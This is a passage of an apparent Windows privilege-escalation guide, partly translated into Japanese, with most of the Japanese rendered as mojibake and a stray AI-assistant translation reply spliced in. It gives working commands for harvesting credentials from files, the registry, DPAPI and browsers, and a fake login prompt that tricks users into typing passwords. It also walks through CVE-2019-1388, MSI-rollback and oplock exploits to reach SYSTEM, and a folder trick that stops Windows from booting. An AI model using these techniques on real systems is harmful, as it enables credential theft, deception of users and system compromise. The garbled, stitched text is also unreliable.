<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>
OpenVPN èªèšŒæ å ±
Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}
foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]
$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}
ãã°
# IIS
C:\inetpub\logs\LogFiles\*
#Apache
Get-Childitem âPath C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue
credentialsãå°ãã
ãããã®ãŠãŒã¶ãŒãç¥ã£ãŠããå¯èœæ§ããããšæãã°ããã€ã§ããŠãŒã¶ãŒã«èªèº«ã®credentialsããããã¯å¥ã®ãŠãŒã¶ãŒã®credentialsãå ¥åããããé Œãããšãã§ããŸãïŒãã ããã¯ã©ã€ã¢ã³ãã«çŽæ¥credentialsãå°ããã®ã¯éåžžã«ãªã¹ããŒã§ããç¹ã«æ³šæããŠãã ããïŒïŒ
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password
#Get plaintext
$cred.GetNetworkCredential() | fl
credentials ãå«ãå¯èœæ§ã®ãããã¡ã€ã«å
éå»ã« passwords ã clear-text ãŸã㯠Base64 ã§å«ãŸããŠããæ¢ç¥ã®ãã¡ã€ã«
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db #Firefox
key4.db #Firefox
places.sqlite #Firefox
"Login Data" #Chrome
Cookies #Chrome
Bookmarks #Chrome
History #Chrome
TypedURLsTime #IE
TypedURLs #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
I donât have access to your repository or files. Please paste the contents of src/windows-hardening/windows-local-privilege-escalation/README.md (or the list of âproposed filesâ you want searched) here, and I will translate the English text to Japanese while preserving markdown/html tags, links, paths and code exactly as requested.
cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem âPath C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
RecycleBinå ã®èªèšŒæ å ±
Bin ã確èªããŠããã®äžã«èªèšŒæ å ±ããªããæ¢ãã¹ãã§ãã
è€æ°ã®ããã°ã©ã ã«ãã£ãŠä¿åããããã¹ã¯ãŒãã埩å ããã«ã¯ã次ã䜿çšã§ããŸã: http://www.nirsoft.net/password_recovery_tools.html
ã¬ãžã¹ããªå
èªèšŒæ å ±ãå«ãå¯èœæ§ã®ãããã®ä»ã®ã¬ãžã¹ããªããŒ
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
Extract openssh keys from registry.
ãã©ãŠã¶å±¥æŽ
passwords ãä¿åãããŠãã Chrome or Firefox ã® dbs ã確èªããŠãã ãã.
ãŸãããã©ãŠã¶ã®å±¥æŽãããã¯ããŒã¯ãããã³ãæ°ã«å
¥ãã確èªããããã« passwords are ä¿åãããŠããªãã確èªããŠãã ããã
Tools to extract passwords from browsers:
- Mimikatz:
dpapi::chrome - SharpWeb
- SharpChromium
- SharpDPAPI
COM DLL Overwriting
Component Object Model (COM) ã¯ãWindows ãªãã¬ãŒãã£ã³ã°ã·ã¹ãã ã«çµã¿èŸŒãŸããæè¡ã§ãç°ãªãèšèªã§æžããããœãããŠã§ã¢ã³ã³ããŒãã³ãéã®çžäºéä¿¡ãå¯èœã«ããŸããå COM ã³ã³ããŒãã³ã㯠class ID (CLSID) ã§èå¥ãããåã³ã³ããŒãã³ã㯠1 ã€ä»¥äžã®ã€ã³ã¿ãŒãã§ã€ã¹ãéããŠæ©èœãå ¬éããããã㯠interface IDs (IIDs) ã§èå¥ãããŸãã
COM ã¯ã©ã¹ãšã€ã³ã¿ãŒãã§ã€ã¹ã¯ããããã HKEY\CLASSES\ROOT\CLSID ããã³ HKEY\CLASSES\ROOT\Interface ã®äžã®ã¬ãžã¹ããªã«å®çŸ©ãããŠããŸãããã®ã¬ãžã¹ããªã¯ HKEY\LOCAL\MACHINE\Software\Classes ãš HKEY\CURRENT\USER\Software\Classes ãããŒãžããŠäœããããã®ã§ãïŒ= HKEY\CLASSES\ROOTïŒã
Inside the CLSIDs of this registry you can find the child registry InProcServer32 which contains a default value pointing to a DLL and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).
.png)
åºæ¬çã«ãå®è¡ããã DLL ã®ãããããäžæžãã§ããã°ããã® DLL ãå¥ã®ãŠãŒã¶ã«ãã£ãŠå®è¡ãããå Žåã« escalate privileges ããããšãã§ããŸãã
æ»æè ã COM Hijacking ãæ°žç¶åã¡ã«ããºã ãšããŠã©ã®ããã«å©çšããããåŠã¶ã«ã¯ã以äžãåç §ããŠãã ãã:
Generic Password search in files and registry
ãã¡ã€ã«ã®å 容ãæ€çŽ¢ãã
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
ç¹å®ã®ãã¡ã€ã«åãæã€ãã¡ã€ã«ãæ€çŽ¢ãã
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
ã¬ãžã¹ããªã§ããŒåãšãã¹ã¯ãŒããæ€çŽ¢ãã
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d
passwords ãæ€çŽ¢ããããŒã«
MSF-Credentials Plugin is a msf ãã©ã°ã€ã³ã§ããç§ã¯ãã®ãã©ã°ã€ã³ãã被害è
å
㧠automatically execute every metasploit POST module that searches for credentials ããããã«äœæããŸããã
Winpeas ã¯ãã®ããŒãžã§èšåãããŠãã passwords ãå«ããã¹ãŠã®ãã¡ã€ã«ãèªåçã«æ€çŽ¢ããŸãã
Lazagne ã¯ã·ã¹ãã ãã password ãæœåºããããã²ãšã€ã®åªããããŒã«ã§ãã
ãã®ããŒã« SessionGopher ã¯ããã®ããŒã¿ãå¹³æã§ä¿åããããã€ãã®ããŒã«ïŒPuTTY, WinSCP, FileZilla, SuperPuTTY, and RDPïŒã® sessions, usernames ãš passwords ãæ€çŽ¢ããŸãã
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
Leaked Handlers
Imagine that a process running as SYSTEM open a new process (OpenProcess()) with full access. The same process also create a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Then, if you have full access to the low privileged process, you can grab the open handle to the privileged process created with OpenProcess() and inject a shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).
Named Pipe Client Impersonation
å ±æã¡ã¢ãªã»ã°ã¡ã³ããæè¬pipesã¯ãããã»ã¹ééä¿¡ãšããŒã¿è»¢éãå¯èœã«ããŸãã
Windowsã¯Named Pipesãšããæ©èœãæäŸããŠãããé¢é£ã®ãªãããã»ã¹éã§ããç°ãªããããã¯ãŒã¯äžã§ããããŒã¿ãå ±æã§ããŸããããã¯ã¯ã©ã€ã¢ã³ã/ãµãŒããŒã¢ãŒããã¯ãã£ã«äŒŒãŠããã圹å²ã¯named pipe serverãšnamed pipe clientãšããŠå®çŸ©ãããŸãã
ã¯ã©ã€ã¢ã³ãããã€ãçµç±ã§ããŒã¿ãéä¿¡ãããšããã€ããèšå®ããserverã¯ãå¿ èŠãªSeImpersonateæš©éãæã£ãŠããå Žåã«ãã®clientã®take on the identityãè¡ãèœåãæã¡ãŸãããã€ãçµç±ã§éä¿¡ããprivileged processãç¹å®ãããããæš¡å£ã§ããå Žåãããªããäœæãããã€ããšçžäºäœçšããéã«ãã®ããã»ã¹ã®ã¢ã€ãã³ãã£ãã£ãåŒãç¶ãããšã§gain higher privilegesããæ©äŒãåŸãããŸãããã®çš®ã®æ»æãå®è¡ããæé ã«ã€ããŠã¯ãhereããã³hereã®ã¬ã€ããåèã«ãªããŸãã
ãŸãã以äžã®ããŒã«ã¯intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows to list and see all the pipes to find privescs https://github.com/cyberark/PipeViewer
Telephony tapsrv remote DWORD write to RCE
The Telephony service (TapiSrv) in server mode exposes \\pipe\\tapsrv (MS-TRP). A remote authenticated client can abuse the mailslot-based async event path to turn ClientAttach into an arbitrary 4-byte write to any existing file writable by NETWORK SERVICE, then gain Telephony admin rights and load an arbitrary DLL as the service. Full flow:
ClientAttachwithpszDomainUserset to a writable existing path â the service opens it viaCreateFileW(..., OPEN_EXISTING)and uses it for async event writes.- Each event writes the attacker-controlled
InitContextfromInitializeto that handle. Register a line app withLRegisterRequestRecipient(Req_Func 61), triggerTRequestMakeCall(Req_Func 121), fetch viaGetAsyncEvents(Req_Func 0), then unregister/shutdown to repeat deterministic writes. - Add yourself to
[TapiAdministrators]inC:\\Windows\\TAPI\\tsec.ini, reconnect, then callGetUIDllNamewith an arbitrary DLL path to executeTSPI_providerUIIdentifyasNETWORK SERVICE.
More details:
Telephony Tapsrv Arbitrary Dword Write To Rce
Misc
File Extensions that could execute stuff in Windows
ãã®ããŒãžã確èªããŠãã ãã https://filesec.io/
Monitoring Command Lines for passwords
ãŠãŒã¶ãŒãšããŠã·ã§ã«ãååŸããå Žåãã¹ã±ãžã¥ãŒã«ãããã¿ã¹ã¯ããã®ä»ã®ããã»ã¹ãå®è¡ããããã®äžã§pass credentials on the command lineããããšããããŸããäžèšã®ã¹ã¯ãªããã¯2ç§ããšã«ããã»ã¹ã®ã³ãã³ãã©ã€ã³ãååŸããçŸåšã®ç¶æ ãšåã®ç¶æ ãæ¯èŒããŠå·®åãåºåããŸãã
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
ããã»ã¹ããã®ãã¹ã¯ãŒãçªå
Low Priv User ãã NT\AUTHORITY SYSTEM ãž (CVE-2019-1388) / UAC Bypass
ã°ã©ãã£ã«ã«ã€ã³ã¿ãŒãã§ãŒã¹ïŒconsole ã RDP çµç±ïŒã«ã¢ã¯ã»ã¹ã§ããUAC ãæå¹ãªå ŽåãMicrosoft Windows ã®äžéšã®ããŒãžã§ã³ã§ã¯ãæš©éã®äœããŠãŒã¶ãŒãã âNT\AUTHORITY SYSTEMâ ã®ãããªã¿ãŒããã«ããã®ä»ã®ããã»ã¹ãå®è¡ããããšãå¯èœã§ãã
ããã«ãããåãè匱æ§ãå©çšããŠæš©éææ Œãš UAC ã®ãã€ãã¹ãåæã«è¡ãããšãã§ããŸããããã«ãäœãã€ã³ã¹ããŒã«ããå¿ èŠã¯ãªããããã»ã¹äžã«äœ¿çšããããã€ããªã¯ Microsoft ã«ãã眲åã»çºè¡ãããŠããŸãã
圱é¿ãåããã·ã¹ãã ã®äžéšã¯ä»¥äžã®ãšããã§ãïŒ
SERVER
======
Windows 2008r2 7601 ** link OPENED AS SYSTEM **
Windows 2012r2 9600 ** link OPENED AS SYSTEM **
Windows 2016 14393 ** link OPENED AS SYSTEM **
Windows 2019 17763 link NOT opened
WORKSTATION
===========
Windows 7 SP1 7601 ** link OPENED AS SYSTEM **
Windows 8 9200 ** link OPENED AS SYSTEM **
Windows 8.1 9600 ** link OPENED AS SYSTEM **
Windows 10 1511 10240 ** link OPENED AS SYSTEM **
Windows 10 1607 14393 ** link OPENED AS SYSTEM **
Windows 10 1703 15063 link NOT opened
Windows 10 1709 16299 link NOT opened
ãã®è匱æ§ãæªçšããã«ã¯ã次ã®æé ãå®è¡ããå¿ èŠããããŸã:
1) Right click on the HHUPD.EXE file and run it as Administrator.
2) When the UAC prompt appears, select "Show more details".
3) Click "Show publisher certificate information".
4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.
5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.
6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.
7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.
8) Remember to cancel setup and the UAC prompt to return to your desktop.
You have all the necessary files and information in the following GitHub repository:
https://github.com/jas502n/CVE-2019-1388
From Administrator Medium to High Integrity Level / UAC Bypass
Read this to learn about Integrity Levels:
Then read this to learn about UAC and UAC bypasses:
From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP
ãã®ææ³ã¯ããã®ããã°æçš¿ã§èª¬æãããŠããããšã¯ã¹ããã€ãã³ãŒãã¯ããã§å ¥æå¯èœã§ãã
æ»æã¯åºæ¬çã«ãWindows Installer ã® rollback æ©èœãæªçšããŠãã¢ã³ã€ã³ã¹ããŒã«äžã«æ£åœãªãã¡ã€ã«ãæªæãããã¡ã€ã«ã«çœ®ãæããããšã«ãããŸããããã«ã¯ãæ»æè
ã C:\Config.Msi ãã©ã«ãããã€ãžã£ãã¯ããããã® æªæã®ãã MSI ã€ã³ã¹ããŒã©ãŒ ãäœæããå¿
èŠããããåŸã« Windows Installer ãä»ã® MSI ããã±ãŒãžã®ã¢ã³ã€ã³ã¹ããŒã«äžã« rollback ãã¡ã€ã«ãä¿åããéã«ããããã® rollback ãã¡ã€ã«ãæªæãããã€ããŒããå«ãããã«å€æŽãããŸãã
èŠçŽãããšãæé ã¯æ¬¡ã®ãšããã§ãã
- Stage 1 â Hijack ã®æºåïŒ
C:\Config.Msiã空ã«ããŠããïŒ
-
Step 1: Install the MSI
-
æžã蟌ã¿å¯èœãªãã©ã«ãïŒ
TARGETDIRïŒã«ç¡å®³ãªãã¡ã€ã«ïŒäŸ:dummy.txtïŒãã€ã³ã¹ããŒã«ãã.msiãäœæããŸãã -
ã€ã³ã¹ããŒã©ãŒã âUAC Compliantâ ã«ããŒã¯ããé管çè ãŠãŒã¶ãŒ ãå®è¡ã§ããããã«ããŸãã
-
ã€ã³ã¹ããŒã«åŸã«ãã¡ã€ã«ãžã® handle ãéãããŸãŸã«ããŸãã
-
Step 2: Begin Uninstall
-
åã
.msiãã¢ã³ã€ã³ã¹ããŒã«ããŸãã -
ã¢ã³ã€ã³ã¹ããŒã«åŠçã¯ãã¡ã€ã«ã
C:\Config.Msiã«ç§»åãã.rbfãã¡ã€ã«ã«ãªããŒã ã㊠rollback ããã¯ã¢ãããäœæããŸãã -
ãã¡ã€ã«ã
C:\Config.Msi\<random>.rbfã«ãªã£ãããšãæ€åºããããã«ãGetFinalPathNameByHandleã䜿ã£ãŠéããŠãããã¡ã€ã«ãã³ãã«ãããŒãªã³ã°ããŸãã -
Step 3: Custom Syncing
-
.msiã«ã¯æ¬¡ã®ãã㪠ã«ã¹ã¿ã ã¢ã³ã€ã³ã¹ããŒã«ã¢ã¯ã·ã§ã³ïŒSyncOnRbfWrittenïŒ ãå«ãŸããŸã: -
.rbfãæžã蟌ãŸãããšãã«ã·ã°ãã«ãéãã -
ãã®åŸãã¢ã³ã€ã³ã¹ããŒã«ãç¶è¡ããåã«å¥ã®ã€ãã³ããåŸ æ©ããŸãã
-
Step 4: Block Deletion of
.rbf -
ã·ã°ãã«ãåãããã
FILE_SHARE_DELETEãªãã§.rbfãã¡ã€ã«ãéã â ããã«ãããã®ãã¡ã€ã«ã®åé€ãé²æ¢ããŸãã -
ãã®åŸãã¢ã³ã€ã³ã¹ããŒã«ãå®äºãããããã« ã·ã°ãã«ãæ»ãã
-
Windows Installer ã¯
.rbfãåé€ã§ããããã¹ãŠã®å 容ãåé€ã§ããªããããC:\Config.Msiã¯åé€ãããŸããã -
Step 5: Manually Delete
.rbf -
æ»æè ã¯
.rbfãã¡ã€ã«ãæåã§åé€ããŸãã -
ããã§
C:\Config.Msiã¯ç©º ã«ãªãããã€ãžã£ãã¯ã§ããç¶æ ã«ãªããŸãã
ãã®æç¹ã§ãSYSTEM ã¬ãã«ã®ä»»æãã©ã«ãåé€è匱æ§ãããªã¬ãŒããŠ
C:\Config.Msiãåé€ããŠãã ããã
- Stage 2 â Rollback ã¹ã¯ãªãããæªæãããã®ã«çœ®ãæãã
-
Step 6: Recreate
C:\Config.Msiwith Weak ACLs -
èªåã§
C:\Config.Msiãã©ã«ããåäœæããŸãã -
匱ã DACLïŒäŸ: Everyone:FïŒãèšå®ãã
WRITE_DACãæ〠handle ãéãããŸãŸã«ããŸãã -
Step 7: Run Another Install
-
å床
.msiãã€ã³ã¹ããŒã«ããŸããèšå®ã¯æ¬¡ã®ãšãã: -
TARGETDIR: æžã蟌ã¿å¯èœãªå Žæã -
ERROROUT: 匷å¶å€±æãåŒãèµ·ããå€æ°ã -
ãã®ã€ã³ã¹ããŒã«ã¯å床 rollback ãããªã¬ãŒããããã«äœ¿çšããã
.rbsãš.rbfãèªã¿èŸŒã¿ãŸãã -
Step 8: Monitor for
.rbs -
ReadDirectoryChangesWã䜿ã£ãŠC:\Config.Msiãç£èŠããæ°ãã.rbsãçŸãããŸã§åŸ ã¡ãŸãã -
ãã®ãã¡ã€ã«åãååŸããŸãã
-
Step 9: Sync Before Rollback
-
.msiã«ã¯ ã«ã¹ã¿ã ã€ã³ã¹ããŒã«ã¢ã¯ã·ã§ã³ïŒSyncBeforeRollbackïŒ ãå«ãŸããŠãã: -
.rbsãäœæããããšãã«ã€ãã³ããã·ã°ãã«ããŸãã -
ãã®åŸãç¶è¡ããåã«åŸ æ©ããŸãã
-
Step 10: Reapply Weak ACL
-
.rbs createdã€ãã³ããåãåã£ãåŸ: -
Windows Installer ã¯
C:\Config.Msiã«åŒ·ã ACL ãåé©çšããŸãã -
ããããããªãã¯ãŸã
WRITE_DACãæã€ãã³ãã«ãæã£ãŠãããããåã³åŒ±ã ACL ãåé©çšã§ããŸãã
ACL ã¯ãã³ãã«ãéãããšãã«ã®ã¿é©çšãããããããã©ã«ãã«æžã蟌ã¿ãå¯èœãªãŸãŸã§ãã
-
Step 11: Drop Fake
.rbsand.rbf -
.rbsãã¡ã€ã«ãäžæžãããŠãWindows ã«æ¬¡ãæ瀺ããåœã® rollback ã¹ã¯ãªãããé 眮ããŸã: -
ããªãã®
.rbfïŒæªæã®ãã DLLïŒã ç¹æš©ã®ããå ŽæïŒäŸ:C:\Program Files\Common Files\microsoft shared\ink\HID.DLLïŒã«åŸ©å ããããæ瀺ããã -
æªæãã SYSTEM ã¬ãã«ã®ãã€ããŒã DLL ãå«ãåœã®
.rbfãé 眮ããŸãã -
Step 12: Trigger the Rollback
-
åæã€ãã³ããã·ã°ãã«ããŠã€ã³ã¹ããŒã©ãŒãåéãããŸãã
-
æ¢ç¥ã®ãã€ã³ãã§ã€ã³ã¹ããŒã«ãæå³çã«å€±æãããããã«æ§æããã type 19 ã«ã¹ã¿ã ã¢ã¯ã·ã§ã³ïŒ
ErrorOutïŒ ã«ãããã€ã³ã¹ããŒã«ã倱æããŸãã -
ããã rollback ã®éå§ ãåŒãèµ·ãããŸãã
-
Step 13: SYSTEM Installs Your DLL
-
Windows Installer ã¯ããªãã®æªæãã
.rbsãèªã¿ã -
ã¿ãŒã²ããå Žæã«ããªãã®
.rbfDLL ãã³ããŒããŸãã -
ãã㧠SYSTEM ã«ããŒãããããã¹ã«æªæãã DLL ãé 眮ããããšã«ãªããŸãã
-
Final Step: Execute SYSTEM Code
-
ä¿¡é Œããã auto-elevated ãã€ããªïŒäŸ:
osk.exeïŒãå®è¡ããŠããã€ãžã£ãã¯ãã DLL ãèªã¿èŸŒãŸããŸãã -
æåïŒããªãã®ã³ãŒãã SYSTEM ãšããŠå®è¡ãããŸãã
From Arbitrary File Delete/Move/Rename to SYSTEM EoP
äž»èŠãª MSI rollback ææ³ïŒåè¿°ã®ãã®ïŒã¯ãC:\Config.Msi ã®ãããªãã©ã«ãå
šäœãåé€ã§ããããšãåæãšããŠããŸããããããè匱æ§ã ä»»æã®ãã¡ã€ã«åé€ã®ã¿ãèš±ã å Žåã¯ã©ãã§ããããïŒ
NTFS ã®å éšãæªçšããããšãã§ããŸãïŒãã¹ãŠã®ãã©ã«ãã«ã¯é ãã®ä»£æ¿ããŒã¿ã¹ããªãŒã ïŒalternate data streamïŒãååšããŸãïŒ
C:\SomeFolder::$INDEX_ALLOCATION
ãã®ã¹ããªãŒã ã¯ãã©ã«ãã®index metadataãæ ŒçŽããŸãã
ãããã£ãŠããã©ã«ãã®**::$INDEX_ALLOCATION ã¹ããªãŒã ãåé€ãããš**ãNTFSã¯ãã¡ã€ã«ã·ã¹ãã ãããã©ã«ãå
šäœãåé€ããŸãã
ããã¯ã次ã®ãããªæšæºçãªãã¡ã€ã«åé€APIã䜿çšããŠè¡ãããšãã§ããŸã:
DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");
ããšã file delete API ãåŒã³åºããŠããŠãããã©ã«ãèªäœãåé€ãããŸãã
ãã©ã«ãå 容ã®åé€ããSYSTEM EoPãž
primitive ãä»»æã®ãã¡ã€ã«/ãã©ã«ããåé€ã§ããªãããæ»æè ãå¶åŸ¡ãããã©ã«ãã®contentsãåé€ã§ãããšãããïŒ
- Step 1: ãã€ããã©ã«ããšãã¡ã€ã«ãã»ããã¢ãã
- äœæ:
C:\temp\folder1 - ãã®äžã«:
C:\temp\folder1\file1.txt
- Step 2:
file1.txtã« oplock ãé 眮
- ç¹æš©ããã»ã¹ã
file1.txtãåé€ããããšãããšãoplock ã¯å®è¡ãäžæåæ¢ããŸãã
// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();
- ã¹ããã 3: Trigger SYSTEM process (e.g.,
SilentCleanup)
- ãã®ããã»ã¹ã¯ãã©ã«ãïŒäŸ:
%TEMP%ïŒãã¹ãã£ã³ãããããã®å 容ãåé€ããããšããŸãã file1.txtã«å°éãããšãoplock triggers ãçºçããã³ã³ãããŒã«ãããªãã® callback ã«æž¡ãããŸãã
- ã¹ããã 4: Inside the oplock callback â redirect the deletion
-
ãªãã·ã§ã³ A: Move
file1.txtelsewhere -
ããã«ãã
folder1ã¯ç©ºã«ãªããŸãããoplock ãå£ããŸããã -
file1.txtãçŽæ¥åé€ããªãã§ãã ãã â ãã㯠oplock ãæ©æã«è§£é€ããŠããŸããŸãã -
ãªãã·ã§ã³ B: Convert
folder1into a junction:
# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control
- ãªãã·ã§ã³ C:
\RPC Controlã« symlink ãäœæãã:
# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")
ããã¯ãã©ã«ãã®ã¡ã¿ããŒã¿ãæ ŒçŽããNTFSã®å éšã¹ããªãŒã ãçã£ãŠããŸã â ãããåé€ãããšãã©ã«ãèªäœãåé€ãããŸãã
- ã¹ããã 5: oplock ã解æŸãã
- SYSTEM ããã»ã¹ã¯åŠçãç¶è¡ãã
file1.txtãåé€ããããšããŸãã - ããããjunction + symlink ã®ãããå®éã«åé€ãããŠããã®ã¯æ¬¡ã®ãã®ã§ã:
C:\Config.Msi::$INDEX_ALLOCATION
çµæ: C:\Config.Msi 㯠SYSTEM ã«ãã£ãŠåé€ãããã
ä»»æã®ãã©ã«ãäœæããæ°žç¶çãªDoSãž
ããªããã£ããæªçšããŠãSYSTEM/admin ãšããŠä»»æã®ãã©ã«ããäœæã§ããŸã â ããšã ãã¡ã€ã«ãæžã蟌ããªã ãŸã㯠匱ãæš©éãèšå®ã§ããªã å Žåã§ãã
äŸãã°ããã©ã«ãïŒãã¡ã€ã«ã§ã¯ãªãïŒã critical Windows driver ã®ååã§äœæããŸããäŸïŒ
C:\Windows\System32\cng.sys
- ãã®ãã¹ã¯éåžž
cng.sysã«ãŒãã«ã¢ãŒããã©ã€ãã«å¯Ÿå¿ããŸãã - ããäºåã«ãã©ã«ããšããŠäœæããŠãããšãWindows ã¯èµ·åæã«å®éã®ãã©ã€ããèªã¿èŸŒããªããªããŸãã
- ãã®åŸãWindows ã¯èµ·åæã«
cng.sysãèªã¿èŸŒãããšããŸãã - ãã©ã«ããæ€åºããå®éã®ãã©ã€ãã解決ã§ãããã¯ã©ãã·ã¥ãŸãã¯èµ·åãåæ¢ããŸãã
- å€éšããã®ä»å ¥ïŒäŸ: ããŒã修埩ããã£ã¹ã¯ã¢ã¯ã»ã¹ïŒãªãã«ã¯ããã©ãŒã«ããã¯ã¯ãªãã埩æ§æ段ã¯ãããŸããã
From High Integrity to System
New service
ããæ¢ã« High Integrity ããã»ã¹ã§å®è¡ããŠããå Žåãpath to SYSTEM ã¯åã« creating and executing a new service ããã ãã§å®¹æã«ãªããŸã:
sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename
Tip
ãµãŒãã¹çšãã€ããªãäœæããéã¯ããããæ£åœãªãµãŒãã¹ã§ããããšããŸãã¯æ£åœãªãµãŒãã¹ã§ãªãå Žåã¯20ç§ã§çµäºãããããå¿ èŠãªåŠçãéããã«å®è¡ããããšã確èªããŠãã ããã
AlwaysInstallElevated
High Integrity process ãããAlwaysInstallElevated ã¬ãžã¹ã㪠ãšã³ããªãæå¹åãã.msi ã©ãããŒã䜿ã£ãŠãªããŒã¹ã·ã§ã«ãã€ã³ã¹ããŒã«ããããšãã§ããŸãã
More information about the registry keys involved and how to install a .msi package here.
High + SeImpersonate privilege to System
åç §ã§ããŸã find the code here.
From SeDebug + SeImpersonate to Full Token privileges
ãããããã®ããŒã¯ã³æš©éãæã£ãŠããã°ïŒããããæ¢ã« High Integrity process å
ã§èŠã€ããã§ãããïŒãSeDebug æš©éã§ã»ãšãã©ã®ããã»ã¹ïŒprotected processes ã¯é€ãïŒãéããããã»ã¹ã®ããŒã¯ã³ãã³ããŒããŠããã®ããŒã¯ã³ã§ä»»æã®ããã»ã¹ãäœæã§ããŸãã
éåžžãã®ææ³ã§ã¯ããã¹ãŠã®ããŒã¯ã³æš©éãæ〠SYSTEM ã§åäœããŠããããã»ã¹ãéžã³ãŸãïŒã¯ãããã¹ãŠã®ããŒã¯ã³æš©éãæããªã SYSTEM ããã»ã¹ãååšããŸãïŒã
äŸã¯ example of code executing the proposed technique hereã§ç¢ºèªã§ããŸãã
Named Pipes
